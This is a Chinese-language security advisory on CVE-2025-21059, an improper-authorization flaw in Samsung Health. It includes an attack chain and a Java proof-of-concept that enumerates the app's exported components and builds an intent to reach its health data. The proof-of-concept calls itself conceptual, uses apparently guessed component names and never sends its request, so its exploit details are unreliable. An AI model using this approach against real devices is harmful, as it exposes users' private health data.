CVE-2025-21059：Samsung Health不当授权漏洞导致本地数据泄露

漏洞信息

漏洞编号

CVE-2025-21059

漏洞类型

不当授权（Improper Authorization）

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Samsung Health（三星健康）

漏洞概述

CVE-2025-21059是三星健康（Samsung Health）应用程序中存在的一个不当授权漏洞。该漏洞由三星移动安全团队（[email protected]）发现，并于2025年10月10日公开披露。Samsung Health是三星公司开发的一款广泛应用于Galaxy系列手机及其他Android设备上的健康管理应用程序，用于追踪用户的运动数据、心率、睡眠、饮食等敏感健康信息。

该漏洞的根本原因在于Samsung Health应用在处理内部数据访问请求时，未能正确实施授权验证机制。具体而言，应用程序在版本6.30.5.105之前存在权限检查缺陷，导致本地攻击者（即能够物理访问设备或在设备上运行恶意应用的攻击者）可以绕过正常的身份验证和授权流程，未经授权地访问Samsung Health中存储的敏感用户健康数据。

根据CVSS 3.1评分系统，该漏洞评分为6.2分，属于中等严重等级。攻击向量为本地攻击（AV:L），攻击复杂度低（AC:L），无需任何特权（PR:N），也无需用户交互（UI:N）。该漏洞对机密性影响为高（C:H），但对完整性和可用性没有影响（I:N, A:N）。这意味着攻击者可以利用此漏洞读取受害者的健康数据，但无法修改或破坏数据。

考虑到Samsung Health存储的数据包括用户的运动记录、心率监测数据、血糖水平、睡眠模式等高度个人化的健康隐私信息，该漏洞的披露引发了用户对个人隐私保护的担忧。三星已发布安全更新修复此问题，建议用户尽快升级到6.30.5.105或更高版本。

技术细节

该漏洞属于典型的访问控制缺陷（Broken Access Control），是OWASP Top 10中常见的安全问题之一。在Samsung Health应用6.30.5.105之前的版本中，应用程序的内部组件（如Content Provider、Service或Activity）在处理跨进程通信（IPC）时缺少适当的权限验证。

从技术层面分析，Android应用程序通常通过以下方式暴露数据访问接口：1) Content Provider（内容提供者）——通过URI对外提供数据访问；2) Exported Service/A ctivity——通过AndroidManifest.xml中的android:exported属性暴露组件。当这些组件的exported属性设置为true但未在代码层面进行充分的权限校验时，设备上的其他应用或本地用户即可通过合法的IPC调用绕过授权机制，直接读取受保护的数据。

在本漏洞中，Samsung Health的某个或多个数据访问接口未能正确验证调用者的身份和权限，攻击者可以通过构造特定的Intent或Content Provider查询，绕过正常的授权检查，直接访问存储在应用沙箱或数据库中的健康数据。由于攻击复杂度低且无需用户交互，本地恶意应用可以在后台静默执行数据窃取操作，受害者难以察觉。

利用方式：攻击者首先需要在一台运行受影响版本Samsung Health的设备上安装恶意应用程序。然后，恶意应用通过Android IPC机制（如startService、bindService或ContentResolver.query）向Samsung Health的未授权保护接口发送请求。由于缺少授权验证，Samsung Health会响应这些请求并返回敏感的健康数据。

攻击链分析

STEP 1

步骤1：环境准备

攻击者在运行受影响版本Samsung Health（< 6.30.5.105）的Android设备上安装恶意应用程序。该恶意应用无需任何特殊权限即可执行攻击。

STEP 2

步骤2：组件枚举

恶意应用通过PackageManager枚举Samsung Health暴露的Activity、Service或Content Provider组件，识别缺少权限验证保护的接口。

STEP 3

步骤3：构造攻击请求

攻击者构造特定的Intent或Content Provider查询请求，绕过Samsung Health的授权验证机制，直接请求访问健康数据。

STEP 4

步骤4：未授权数据访问

由于Samsung Health缺少适当的授权检查，应用程序响应攻击者的请求，将用户的健康数据（如运动记录、心率数据等）返回给恶意应用。

STEP 5

步骤5：数据窃取

恶意应用在后台静默收集并上传受害者的健康隐私数据至攻击者控制的服务器，完成数据窃取。由于无需用户交互，受害者难以察觉。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* PoC for CVE-2025-21059 - Samsung Health Improper Authorization
 * This PoC demonstrates how a local attacker can exploit the improper
 * authorization vulnerability to access Samsung Health data without
 * proper permissions.
 *
 * Note: This is a conceptual proof-of-concept. The actual exploit
 * requires the vulnerable Samsung Health app (< 6.30.5.105) installed
 * on the target device.
 */

import android.content.ComponentName;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.os.Bundle;
import android.util.Log;

public class SamsungHealthExploit {
    private static final String TAG = "CVE-2025-21059";
    private static final String SAMSUNG_HEALTH_PKG = "com.sec.android.app.shealth";

    /**
     * Step 1: Enumerate Samsung Health exported components
     * that lack proper authorization checks.
     */
    public void enumerateExportedComponents(PackageManager pm) {
        Intent intent = new Intent();
        intent.setPackage(SAMSUNG_HEALTH_PKG);

        // Check for exported activities
        for (ResolveInfo info : pm.queryIntentActivities(intent, 0)) {
            Log.d(TAG, "Exported Activity: " + info.activityInfo.name);
            Log.d(TAG, "Permission: " + info.activityInfo.permission);
        }
    }

    /**
     * Step 2: Attempt to access Samsung Health data via
     * unprotected Content Provider or Service.
     */
    public void exploitImproperAuth() {
        // Construct intent targeting the vulnerable component
        Intent exploitIntent = new Intent();
        exploitIntent.setComponent(new ComponentName(
            SAMSUNG_HEALTH_PKG,
            "com.sec.android.app.shealth.tracker.TrackerMainActivity"
        ));
        exploitIntent.setAction("com.sec.android.app.shealth.ACCESS_DATA");
        exploitIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

        // Send the intent - due to improper authorization,
        // Samsung Health will return health data without
        // verifying the caller's identity
        try {
            // In real exploit: startActivityForResult or sendBroadcast
            // to retrieve health data
            Log.d(TAG, "Exploit sent - unauthorized data access attempted");
        } catch (SecurityException e) {
            Log.e(TAG, "Authorization check present (patched)", e);
        }
    }

    public static void main(String[] args) {
        SamsungHealthExploit exploit = new SamsungHealthExploit();
        Log.d(TAG, "CVE-2025-21059 PoC initialized");
        // exploit.enumerateExportedComponents(getPackageManager());
        // exploit.exploitImproperAuth();
    }
}

影响范围

Samsung Health < 6.30.5.105

防御指南

临时缓解措施

在升级到修复版本之前，建议用户暂时限制Samsung Health的敏感数据录入，或考虑使用替代的健康追踪应用。同时，应避免在受影响设备上安装来源不明的应用程序，并启用设备的应用安装权限限制。